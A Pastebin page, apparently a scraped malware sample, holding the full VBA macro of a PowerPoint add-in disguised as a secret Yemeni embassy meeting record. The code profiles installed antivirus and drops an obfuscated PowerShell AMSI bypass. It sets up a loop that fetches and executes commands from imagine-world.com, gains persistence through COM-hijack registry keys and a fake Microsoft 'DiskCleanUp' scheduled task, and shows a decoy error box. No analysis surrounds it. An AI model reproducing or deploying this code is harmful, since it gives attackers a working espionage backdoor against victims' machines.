API tools faq
paste
Advertisement
TrashScrape

a65ad679989b3a403eca8d3e7ba442e9

TrashScrape
May 1st, 2022
1,434
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 6.60 KB | None | 0 0
raw download clone embed print report
  1. a65ad679989b3a403eca8d3e7ba442e9
  2. سري للغاية - مكتب السفير- محاضر اجتماعات السفيرمع المبعوث الأمريكي لليمن-.ppam
  3. https://imagine-world.com/'+$caughtd
  4.  
  5. Sub R1P2W3()
  6.  
  7.     Buddhao = ""
  8.     Set smalli = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  9.     Clemensa = "securitycenter2"
  10.  
  11.     Set prosperousz = GetObject("winmgmts:\\localhost\root\" & Clemensa)
  12.     Set fileds = prosperousz.execquery("select * from antivirusproduct", "wql", 0)
  13.  
  14.     For Each whipj In fileds
  15.         Buddhao = Buddhao & whipj.DisplayName & " ."
  16.     Next
  17.  
  18.     Set Personv = CreateObject("Scripting.FileSystemObject")
  19.  
  20.     Set oldx = Personv.CreateTextFile("C:\ProgramData\eineg.txt")
  21.         If InStr(Buddhao, "Norton") = False Then
  22.             oldx.Write "try{Remove-Module -Name PSReadline -Force}catch{};$rumourm = 'Sys';$rumourm += 'tem.Ma';$rumourm += 'nagement.Au';$rumourm += 'tom';$rumourm += 'ation.';$rumourm += 'A';$rumourm += 'm';$payingo = 's';$payingo += 'i';$payingo += 'Ut';$payingo += 'ils';$possibilitiess = 'In';$vaanl = 'itF';$Characterg = 'ailed';$treasuresv = 'am';$treasuresv += 's';$treasuresv += 'i' ;$questiona = $treasuresv + $possibilitiess + $vaanl + $Characterg ;$Legislaturej = $null;$motorg = $true;$liket = [Ref].Assembly.GetType($rumourm + $payingo).GetField($questiona,'NonPublic,Static');$liket.SetValue($Legislaturej, $motorg);"
  23.         End If
  24.         oldx.Write "function ixv($caughtd){$zen = [Net.WebRequest]::Create('https://imagine-world.com/'+$caughtd);$zen.Method='GET';$zen.UserAgent='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:EXC_28) Gecko/21.40.19.28 Firefox/2.0';$zen.Accept='text/html,application/json;q=0.9,*/*;q=0.8';$zen.ContentLength=0;$Jagy=$zen.GetResponse();$global:status=[int]$Jagy.StatusCode;$Riceb=$Jagy.GetResponseStream();$RicebReader=new-object System.IO.StreamReader $Riceb;$alteny=$RicebReader.ReadToEnd();$RicebReader.Close();$Jagy.Close();return $alteny}while($true){$vinesz=ixv('');if ($global:status -eq 200 -and -not [string]::IsNullOrEmpty($vinesz)){$vinesz=$vinesz.ToString().Substring($vinesz.IndexOf('<p>')+3, $vinesz.LastIndexOf('</p>')-$vinesz.IndexOf('<p>')-3);iex($vinesz)}Get-Random -Minimum 60 -Maximum 100 | start-sleep}"
  25.     oldx.Close
  26.     Pleasec = InStr(Buddhao, "Avast") Or InStr(Buddhao, "AVG") Or InStr(Buddhao, "360")
  27.     If Pleasec Then
  28.         deriveo = 1
  29.         selfr = "C:\ProgramData\prncnfg.txt"
  30.     Else
  31.         deriveo = False
  32.         selfr = "C:\ProgramData\prncnfg.v"
  33.         selfr = selfr & Chr(98)
  34.         selfr = selfr & "s"
  35.     End If
  36.  
  37.     Set Africanv = Personv.CreateTextFile(selfr)
  38.         Africanv.Write "CreateObject(""Shell.Application"").ShellExecute "
  39.         Africanv.Write """p"
  40.         Africanv.Write "o"
  41.         Africanv.Write "w"
  42.         Africanv.Write "e"
  43.         Africanv.Write "r"
  44.         Africanv.Write "s"
  45.         Africanv.Write "h"
  46.         Africanv.Write "e"
  47.         Africanv.Write "l"
  48.         Africanv.Write "l"","
  49.         Africanv.Write """-C "" & (CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""C:\ProgramData\eineg.txt"").ReadAll),,, 0"
  50.     Africanv.Close
  51.  
  52.     If deriveo Then
  53.         selfr = "//B //E:v" & Chr(98) & "s" & "cript " & selfr
  54.     Else
  55.         selfr = "//B " & selfr
  56.     End If
  57.  
  58.     byc = Pleasec Or InStr(Buddhao, "F-Secure") Or InStr(Buddhao, "BitDefender")
  59.     If byc = False Then
  60.         temp = CreateObject("Wscript.Shell").ExpandEnvironmentStrings("%temp%")
  61.         If Buddhao = "Windows Defender ." Then
  62.             Set Africanv = Personv.CreateTextFile(temp & "\gatherNetworkInfo.v" & Chr(98) & "s")
  63.             Africanv.Write "CreateObject(""Wscript.Shell"").RegWrite ""HKCU\Software\Classes\WbemScripting.SWbemLocator\CLSID\"", ""{4757f757-187e-4483-9e1c-c6ff3a16b670}"", ""REG_SZ"":CreateObject(""Wscript.Shell"").RegWrite ""HKCU\Software\Classes\CLSID\{4757f757-187e-4483-9e1c-c6ff3a16b670}\LocalServer32\"", ""wscript.exe " & selfr & """, ""REG_SZ"""
  64.             Africanv.Close
  65.             waitTill = Now() + TimeValue("00:00:01")
  66.             While Now() < waitTill
  67.                 DoEvents
  68.             Wend
  69.             CreateObject("Shell.Application").ShellExecute "explorer.exe", temp & "\gatherNetworkInfo.v" & Chr(98) & "s", , , 0
  70.             waitTill = Now() + TimeValue("00:00:01")
  71.             While Now() < waitTill
  72.                 DoEvents
  73.             Wend
  74.             On Error Resume Next
  75.             CreateObject("Shell.Application").ShellExecute "cscript.exe", "C:\windows\System32\Printing_Admin_Scripts\en-US\prnport.v" & Chr(98) & "s" & " -g", , , 0
  76.             MsgBox "Something went wrong!" & vbCrLf & "Kindly contact the sender to send you the file again.", vbCritical, "Error"
  77.             Exit Sub
  78.         End If
  79.         Set Africanv = Personv.CreateTextFile(temp & "\gatherNetworkInfo.v" & Chr(98) & "s")
  80.         Africanv.Write "CreateObject(""Wscript.Shell"").RegWrite ""HKCU\Software\Classes\CLSID\{00021400-0000-0000-C000-000000000046}\shell\open\command\"", ""wscript.exe "" & """ & selfr & """, ""REG_SZ"":CreateObject(""Shell.Application"").ShellExecute ""shell:Desktop"",,,, 0"
  81.         Africanv.Close
  82.         waitTill = Now() + TimeValue("00:00:01")
  83.         While Now() < waitTill
  84.             DoEvents
  85.         Wend
  86.         CreateObject("Shell.Application").ShellExecute "explorer.exe", temp & "\gatherNetworkInfo.v" & Chr(98) & "s", , , 0
  87.         MsgBox "Something went wrong!" & vbCrLf & "Kindly contact the sender to send you the file again.", vbCritical, "Error"
  88.         Exit Sub
  89.     End If
  90.     Set Madamg = CreateObject("Schedule.Service")
  91.     Call Madamg.Connect
  92.  
  93.     Set Newsg = Madamg.NewTask(0)
  94.  
  95.     Set mapl = Newsg.RegistrationInfo
  96.     mapl.Description = "Maintenance task used by the system to launch a silent auto disk cleanup when running low on free disk space."
  97.     mapl.Author = "Microsoft Corporation"
  98.     mapl.Version = 1
  99.     mapl.Source = "Microsoft Windows"
  100.     mapl.URI = "DiskCleanUp"
  101.  
  102.     Set looko = Newsg.Settings
  103.     looko.Enabled = True
  104.     looko.DisallowStartIfOnBatteries = False
  105.     looko.StopIfGoingOnBatteries = False
  106.     looko.StartWhenAvailable = True
  107.     looko.MultipleInstances = 3
  108.     looko.AllowHardTerminate = False
  109.     looko.ExecutionTimeLimit = "PT0S"
  110.  
  111.     Set ribbonsf = Newsg.triggers
  112.     Set salonr = ribbonsf.Create(7)
  113.  
  114.     Set crownedg = Newsg.Actions.Create(0)
  115.     crownedg.Path = "wscript.exe"
  116.     crownedg.Arguments = selfr
  117.  
  118.     Call Madamg.GetFolder("\").RegisterTaskDefinition("DiskCleanUp", Newsg, 6, , , 0)
  119.     MsgBox "Something went wrong!" & vbCrLf & "Kindly contact the sender to send you the file again.", vbCritical, "Error"
  120. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!